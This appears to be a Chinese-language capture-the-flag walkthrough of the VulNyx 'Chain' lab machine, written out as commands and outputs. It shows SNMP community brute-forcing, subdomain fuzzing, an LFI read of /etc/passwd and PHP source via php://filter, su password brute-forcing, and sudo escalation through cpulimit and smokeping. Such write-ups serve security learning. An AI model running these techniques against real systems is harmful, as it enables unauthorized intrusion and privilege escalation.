信息收集

服务探测

❯ sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       VMware, Inc.
192.168.60.2    00:50:56:e3:f6:57       VMware, Inc.
192.168.60.231  08:00:27:21:0c:70       PCS Systemtechnik GmbH
192.168.60.254  00:50:56:e1:d8:58       VMware, Inc.

10 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.053 seconds (124.70 hosts/sec). 4 responded
❯ export ip=192.168.60.231
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
You miss 100% of the ports you don't scan. - RustScan

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.231:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-05 21:27 CST
Initiating ARP Ping Scan at 21:27
Scanning 192.168.60.231 [1 port]
Completed ARP Ping Scan at 21:27, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 21:27
Completed Parallel DNS resolution of 1 host. at 21:27, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 21:27
Scanning 192.168.60.231 [1 port]
Discovered open port 80/tcp on 192.168.60.231
Completed SYN Stealth Scan at 21:27, 0.03s elapsed (1 total ports)
Nmap scan report for 192.168.60.231
Host is up, received arp-response (0.00032s latency).
Scanned at 2025-03-05 21:27:33 CST for 0s

PORT   STATE SERVICE REASON
80/tcp open  http    syn-ack ttl 64
MAC Address: 08:00:27:21:0C:70 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.30 seconds
           Raw packets sent: 2 (72B) | Rcvd: 2 (72B)

只开放了80端口，枚举目录

❯ gobuster dir -u "http://$ip" -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,zip,txt -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.231
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   403,404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html,zip,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 202]
/wordpress            (Status: 301) [Size: 320] [--> http://192.168.60.231/wordpress/]
/javascript           (Status: 301) [Size: 321] [--> http://192.168.60.231/javascript/]
Progress: 1038215 / 1038220 (100.00%)
===============================================================
Finished
===============================================================

陷阱

浏览器访问一下80端口

有一张图片以及提示

wget下来看一下，好像没有什么信息

❯ exiftool chain.png
ExifTool Version Number         : 13.00
File Name                       : chain.png
Directory                       : .
File Size                       : 44 kB
File Modification Date/Time     : 2023:06:23 18:25:22+08:00
File Access Date/Time           : 2025:03:05 21:33:09+08:00
File Inode Change Date/Time     : 2025:03:05 21:32:52+08:00
File Permissions                : -rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Resolution Unit                 : None
X Resolution                    : 1
Y Resolution                    : 1
Image Width                     : 820
Image Height                    : 673
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 820x673
Megapixels                      : 0.552

我以为是图片隐写之类的，利用stegseek尝试解密，无果

但是利用binwalk得到图片中还藏有其他隐藏信息

有个私钥文件，利用dd工具分离出来

爆破一下私钥文件得到密码blue12

❯ binwalk chain.png

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             JPEG image data, JFIF standard 1.01
42205         0xA4DD          PEM RSA private key

❯ dd if=chain.png of=id_rsa bs=1 skip=42205
1758+0 records in
1758+0 records out
1758 bytes (1.8 kB, 1.7 KiB) copied, 0.00131424 s, 1.3 MB/s
❯ cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,92E78A581F3E1F25

pLzUnqFfRfhNyMnFWUQJj0+h6ctKAR0G83+8TCL7X8H571/20pdIDmQtLVut5Che
n3RZu7O1xq8SK5G6ivVj3JtrijV5M541c90dp6I1V1dkg/+iYIOEich7VXj/uZ8n
RgQRpgAompw4EEC/+Q8WhvPadl/6syW1+UvlZlzV0mAlYQxDVF/PiJDoxt7QBXVF
UQ1Oma+4D/E1EL9PxWYfcqmEZRavN3FdCQ8DNiApBXWRwUkina2G+dkZBkZJhroh
t+YnSTOv/ls+//Xb2xoovj8n3fI6jG7VLCeXY3GuxZTqAkT5yG5iC3qvszeb411f
nlGjkcUTHYLjVC/zuyz01zOJTw0gYiss7eMdl3arOvV1Da0qkov2o1ht1R+gEa/c
COhaYjNoBdFKLzGr7Xf8RfqouIgL8IrIe50q3jar+S5Z5M4D1pKdEWlAUjP2ais7
MUk8hk2gq0IuGEbwDG7JRXOSbbMM4FGYU3Ot4g1eFbjTTYUS91/jGrufUpw9Ec+6
l4K5Ee5uZeIio4rMwcdqinA9rvgfYJiHZ5q9Di/MW9T/7HQVYWCEEXngILpDwVlK
sEwUcqAMCObxYBG0FEc2IV4dnMIDTuRFJoNy9sWifKEnNM1TnBhUyYDZFaJNEiRP
JGT9vmDRqlQYQQvqPmf+uoYkH554OFYEbUhjNgULO7k2NLD0+0i5nU4zVMwg1Btc
SjBLIMmyYpj5RT/U8DZiefCWbyYCkz6BwyvGiUBGlGIbWTM5fCajqOhUSsh0616C
xCOuftFjPI4AaRTEb+hSQAvKq6ePvw6ErmrUJK2xOMW6U6CLTbWXhRJ3grR7MXUV
BWZyrPHRntGiLNqX+ZH/M7JRZegvY2uhMPmPeq7hH9x/UqIghvYilKEqruui4j73
EGiJRBD9h7buEispZoLhXZmgw3XmHqOPC+oCK4XCrXqRaOSrN2X/ufyhyLvO+CsK
rMAJnifHZBkUq1HXU1BmEcK4eBPXRq/RZsvKgPiswZjYQOwjx36+rvts6wb5XRyY
l29jefPpaWw7eCZbfA+9Czi2PTpLd2WOKhOl0Lq3kgdZ+NCTkVKCD3Ortbx9UNJZ
aCXj/iaCFBFWcs7JUCW/go1jyucRjAhcPhynD+6QkV7E8i1fgTAEzmhJhybxVlb9
RXiC7qk7LpQM/TMf2VoX7Bt1t/Gx/Afblfz3H6xtCyuMlkCHXdius7z121BzY9D6
PytF26BXw6vM29wOzxkLtX0TT0a+6A2GSiH19qnEcwWqsy6XrYrcIgVtzGyepMPL
ggIxeKc8W32N2wn73zAI7Oa1DyQFlVfF+Ve0ObYKDpIMhwa0q+9q0AwLWDq3SG2m
a1osxjpqh0Puy+XlStMuIN234LupUR6Q/A7UoSbZosIMhBoyLWNH0pYr36kLApcC
YTnAhcvTzAs/jdPSo5Qze6U4G8G0MDRstUEugfvoEoEf+iZkBJEvYlOQc7Sc2vdC
qd+4B2iD0e5kBvUxmiNmTiC+9xP1oi5Z2PR28bcGy7JWj3yQ8ra4YKP1PLbmY1yq
MwqyWhIV0Hv1iSp8iEXWwRX/BuQH5nbHWgkzykGQkEp8c2M2op0CaA==
-----END RSA PRIVATE KEY-----
❯ ssh2john id_rsa >hash
❯ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
blue12           (id_rsa)
1g 0:00:00:00 DONE (2025-03-05 21:47) 33.33g/s 99200p/s 99200c/s 99200C/s kikay..14789632
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

不过我们并不知道用户名，而且靶机并没有开放22端口

所以这个大概率是混淆我们思路的

SNMP协议枚举

其他信息也没有，只能剑走偏锋了

尝试扫一下UDP端口

扫的比较慢，不过可以发现开放了161端口SNMP服务

❯ nmap -sU -sV --version-intensity 0 -n -F -T4 $ip
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-05 22:04 CST
Nmap scan report for 192.168.60.231
Host is up (0.0011s latency).
Not shown: 59 open|filtered udp ports (no-response), 40 closed udp ports (port-unreach)
PORT    STATE SERVICE VERSION
161/udp open  snmp    net-snmp
MAC Address: 08:00:27:21:0C:70 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 45.54 seconds

我们可以通过SNMP服务查看大量有关主机的信息

Brute Force - CheatSheet - HackTricks

利用上面的命令，尝试爆破一下社区字符串

得到security

1
2
3

❯ onesixtyone -c /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt $ip
Scanning 1 hosts, 122 communities
192.168.60.231 [security] Linux chain 5.10.0-23-amd64 #1 SMP Debian 5.10.179-1 (2023-05-12) x86_64

SNMP（简单网络管理协议）的社区字符串是一种用于访问和控制网络设备数据的凭证。社区字符串可以看作是设备的用户ID或密码，当发送SNMP请求时，它会与请求一起发送。社区字符串有以下几种类型：

只读社区字符串（Read-only Community String）：允许设备从另一个设备中提取只读数据。

读写社区字符串（Read-write Community String）：用于提取数据并更改设备配置。

SNMP陷阱社区字符串（SNMP Trap Community String）：当设备发送SNMP陷阱时使用。

社区字符串在不同的SNMP版本中有所不同。常见的SNMP版本包括SNMPv1、SNMPv2c和SNMPv32。

利用snmpwalk枚举一下SNMP

从枚举中的信息得到靶机还有绑定了一个域名chaincorp.nyx

❯ snmpwalk -v1 -c security $ip
iso.3.6.1.2.1.1.1.0 = STRING: "Linux chain 5.10.0-23-amd64 #1 SMP Debian 5.10.179-1 (2023-05-12) x86_64"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
iso.3.6.1.2.1.1.3.0 = Timeticks: (323096) 0:53:50.96
iso.3.6.1.2.1.1.4.0 = STRING: "Blue <[email protected]>"
iso.3.6.1.2.1.1.5.0 = STRING: "Chain"
iso.3.6.1.2.1.1.6.0 = STRING: "VulNyx.com"
iso.3.6.1.2.1.1.8.0 = Timeticks: (4) 0:00:00.04
iso.3.6.1.2.1.1.9.1.2.1 = OID: iso.3.6.1.6.3.10.3.1.1
iso.3.6.1.2.1.1.9.1.2.2 = OID: iso.3.6.1.6.3.11.3.1.1
iso.3.6.1.2.1.1.9.1.2.3 = OID: iso.3.6.1.6.3.15.2.1.1
iso.3.6.1.2.1.1.9.1.2.4 = OID: iso.3.6.1.6.3.1
iso.3.6.1.2.1.1.9.1.2.5 = OID: iso.3.6.1.6.3.16.2.2.1
iso.3.6.1.2.1.1.9.1.2.6 = OID: iso.3.6.1.2.1.49
iso.3.6.1.2.1.1.9.1.2.7 = OID: iso.3.6.1.2.1.50
iso.3.6.1.2.1.1.9.1.2.8 = OID: iso.3.6.1.2.1.4
iso.3.6.1.2.1.1.9.1.2.9 = OID: iso.3.6.1.6.3.13.3.1.3
iso.3.6.1.2.1.1.9.1.2.10 = OID: iso.3.6.1.2.1.92
iso.3.6.1.2.1.1.9.1.3.1 = STRING: "The SNMP Management Architecture MIB."
iso.3.6.1.2.1.1.9.1.3.2 = STRING: "The MIB for Message Processing and Dispatching."
iso.3.6.1.2.1.1.9.1.3.3 = STRING: "The management information definitions for the SNMP User-based Security Model."
iso.3.6.1.2.1.1.9.1.3.4 = STRING: "The MIB module for SNMPv2 entities"
iso.3.6.1.2.1.1.9.1.3.5 = STRING: "View-based Access Control Model for SNMP."
iso.3.6.1.2.1.1.9.1.3.6 = STRING: "The MIB module for managing TCP implementations"
iso.3.6.1.2.1.1.9.1.3.7 = STRING: "The MIB module for managing UDP implementations"
iso.3.6.1.2.1.1.9.1.3.8 = STRING: "The MIB module for managing IP and ICMP implementations"
iso.3.6.1.2.1.1.9.1.3.9 = STRING: "The MIB modules for managing SNMP Notification, plus filtering."
iso.3.6.1.2.1.1.9.1.3.10 = STRING: "The MIB module for logging SNMP Notifications."
iso.3.6.1.2.1.1.9.1.4.1 = Timeticks: (3) 0:00:00.03
iso.3.6.1.2.1.1.9.1.4.2 = Timeticks: (3) 0:00:00.03
iso.3.6.1.2.1.1.9.1.4.3 = Timeticks: (3) 0:00:00.03
iso.3.6.1.2.1.1.9.1.4.4 = Timeticks: (3) 0:00:00.03
iso.3.6.1.2.1.1.9.1.4.5 = Timeticks: (3) 0:00:00.03
iso.3.6.1.2.1.1.9.1.4.6 = Timeticks: (3) 0:00:00.03
iso.3.6.1.2.1.1.9.1.4.7 = Timeticks: (3) 0:00:00.03
iso.3.6.1.2.1.1.9.1.4.8 = Timeticks: (3) 0:00:00.03
iso.3.6.1.2.1.1.9.1.4.9 = Timeticks: (4) 0:00:00.04
iso.3.6.1.2.1.1.9.1.4.10 = Timeticks: (4) 0:00:00.04
iso.3.6.1.2.1.25.1.1.0 = Timeticks: (323358) 0:53:53.58
iso.3.6.1.2.1.25.1.2.0 = Hex-STRING: 07 E9 03 05 0F 14 2F 00 2B 01 00
iso.3.6.1.2.1.25.1.3.0 = INTEGER: 393216
iso.3.6.1.2.1.25.1.4.0 = STRING: "BOOT_IMAGE=/boot/vmlinuz-5.10.0-23-amd64 root=UUID=5ed23ff9-728b-4a2d-b183-ac3d76b133ba ro quiet
"
iso.3.6.1.2.1.25.1.5.0 = Gauge32: 0
iso.3.6.1.2.1.25.1.6.0 = Gauge32: 82
iso.3.6.1.2.1.25.1.7.0 = INTEGER: 0
End of MIB

编辑一下hosts，添加域名

1 2	❯ echo "$ip chaincorp.nyx"\|sudo tee -a /etc/hosts 192.168.60.231 chaincorp.nyx

枚举子域名

尝试模糊测试一下，枚举子域名

发现存在utils.chaincorp.nyx

❯ wfuzz -c -u "http://chaincorp.nyx" -H "HOST:FUZZ.chaincorp.nyx" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --hw 22

 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://chaincorp.nyx/
Total requests: 114441

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000012080:   200        20 L     37 W       628 Ch      "utils - utils"

Total time: 51.52052
Processed Requests: 114441
Filtered Requests: 114436
Requests/sec.: 2221.270

再次编辑一下hosts

1 2	❯ echo "$ip chaincorp.nyx utils.chaincorp.nyx"\|sudo tee -a /etc/hosts 192.168.60.231 chaincorp.nyx utils.chaincorp.nyx

curl一下，发现存在LFI文件包含漏洞

尝试拿一下/etc/passwd

得到两个用户blue和red

❯ curl utils.chaincorp.nyx
<!DOCTYPE html>
<html>
<head>
  <title>System Utils</title>
</head>
<body>
  <h1>System Utils</h1>
  <p>Choose the desired utility and run it.</p>
  <ul>
    <li><a href="include.php?in=id.php">id</a></li>
    <li><a href="include.php?in=ip.php">ip</a></li>
    <li><a href="include.php?in=ps.php">ps</a></li>
    <li><a href="include.php?in=ss.php">ss</a></li>
    <li><a href="include.php?in=uname.php">uname</a></li>
    <li><a href="include.php?in=uptime.php">uptime</a></li>
    <li><a href="include.php?in=whoami.php">whoami</a></li>
    <li><a href="include.php?in=hostname.php">hostname</a></li>
  </ul>
</body>
</html>
❯ curl http://utils.chaincorp.nyx/include.php\?in\=../../../../etc/passwd |grep /bin/bash
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  1621  100  1621    0     0   460k      0 --:--:-- --:--:-- --:--:--  527k
root:x:0:0:root:/root:/bin/bash
blue:x:1000:1000:blue:/home/blue:/bin/bash
red:x:1001:1001:red:/home/red:/bin/bash

同时发现可以利用php过滤器进行读取文件源码

❯ curl http://utils.chaincorp.nyx/include.php\?in\=php://filter/convert.base64-encode/resource\=include.php
<pre>
PHByZT4KPD9waHAKICAkZmlsZSA9ICRfR0VUWyJpbiJdOwogIGlmKGlzc2V0KCRmaWxlKSkKICB7CiAgICBpbmNsdWRlKCIkZmlsZSIpOwogIH0KPz4KPC9wcmU+Cg==</pre>
❯ echo "PHByZT4KPD9waHAKICAkZmlsZSA9ICRfR0VUWyJpbiJdOwogIGlmKGlzc2V0KCRmaWxlKSkKICB7CiAgICBpbmNsdWRlKCIkZmlsZSIpOwogIH0KPz4KPC9wcmU+Cg=="|base64 -d
<pre>
<?php
  $file = $_GET["in"];
  if(isset($file))
  {
    include("$file");
  }
?>
</pre>

LFI2Rce

尝试利用PHP Filters 链来进行执行任意命令

参考HackMyVM-Medusa-Walkthrough | Pepster’Blog

curl访问一下

用户提权

监听一下端口

❯ pwncat-cs -lp 4444
[22:39:35] Welcome to pwncat 🐈!                        __main__.py:164
[22:40:42] received connection from 192.168.60.231:45052     bind.py:84
[22:40:43] 192.168.60.231:45052: registered new host w/  manager.py:957
           db
(local) pwncat$
(remote) www-data@chain:/var/www/vhost$

我尝试利用上面拿到的私钥进行本地ssh登录

结果还是登录不上，可能.ssh权限有问题

(remote) www-data@chain:/var/www/html$ cd /tmp/
(remote) www-data@chain:/tmp$ vi id_rsa
(remote) www-data@chain:/tmp$ chmod 600 id_rsa
(remote) www-data@chain:/tmp$ ssh blue@localhost -i id_rsa
The authenticity of host 'localhost (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:12N3485v29gfnxp3ZD1Mt/mS9bwzNIr13ANJRuIcbcQ.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'localhost' (ECDSA) to the list of known hosts.
Enter passphrase for key 'id_rsa':
blue@localhost: Permission denied (publickey).
(remote) www-data@chain:/tmp$ ssh red@localhost -i id_rsa
Enter passphrase for key 'id_rsa':
red@localhost: Permission denied (publickey).

没其他信息，只能尝试爆破用户密码了

我都跑一半了竟然还没出⁉️

(remote) www-data@chain:/tmp$ ./suForce -u blue -w techyou.txt
            _____
 ___ _   _ |  ___|__  _ __ ___ ___
/ __| | | || |_ / _ \| '__/ __/ _ \
\__ \ |_| ||  _| (_) | | | (_|  __/
|___/\__,_||_|  \___/|_|  \___\___|
───────────────────────────────────
 code: d4t4s3c     version: v1.0.0
───────────────────────────────────
🎯 Username | blue
📖 Wordlist | techyou.txt
🔎 Status   | 12974/20000/64%/303677

Root提权

看了一下WP，发现suForce有问题，得中断重新运行一遍

(remote) www-data@chain:/tmp$ ./suForce -u blue -w techyou.txt
            _____
 ___ _   _ |  ___|__  _ __ ___ ___
/ __| | | || |_ / _ \| '__/ __/ _ \
\__ \ |_| ||  _| (_) | | | (_|  __/
|___/\__,_||_|  \___/|_|  \___\___|
───────────────────────────────────
 code: d4t4s3c     version: v1.0.0
───────────────────────────────────
🎯 Username | blue
📖 Wordlist | techyou.txt
🔎 Status   | 2305/20000/11%/skyblue
💥 Password | skyblue
───────────────────────────────────


(remote) www-data@chain:/tmp$ su blue
Password:
blue@chain:/tmp$

先拿个user flag，发现用户blue拥有sudo权限

可以利用cpulimit提权至red用户

同时red用户也用sudo权限

blue@chain:/tmp$ cat ~/user.txt
eb46e37ab06e8c080be2b907036b8205
blue@chain:/tmp$ sudo -l
Matching Defaults entries for blue on chain:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User blue may run the following commands on chain:
    (red) NOPASSWD: /usr/bin/cpulimit
blue@chain:/tmp$ sudo -u red /usr/bin/cpulimit -l 100 -f /bin/sh
Process 77631 detected
red@chain:/tmp$ sudo -l
Matching Defaults entries for red on chain:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User red may run the following commands on chain:
    (root) NOPASSWD: /usr/sbin/smokeping

查看一下用法，利用--max参数可以调用less正常提权即可

--man[=x]：显示程序的手册页（或者显示指定探测器的手册页）。

red@chain:/tmp$ sudo /usr/sbin/smokeping --man
You need to install the perl-doc package to use this program.
root@chain:/tmp# id
uid=0(root) gid=0(root) grupos=0(root)
root@chain:/tmp# cat /root/root.txt
e3ed9239f6a751276f3e803968efb36b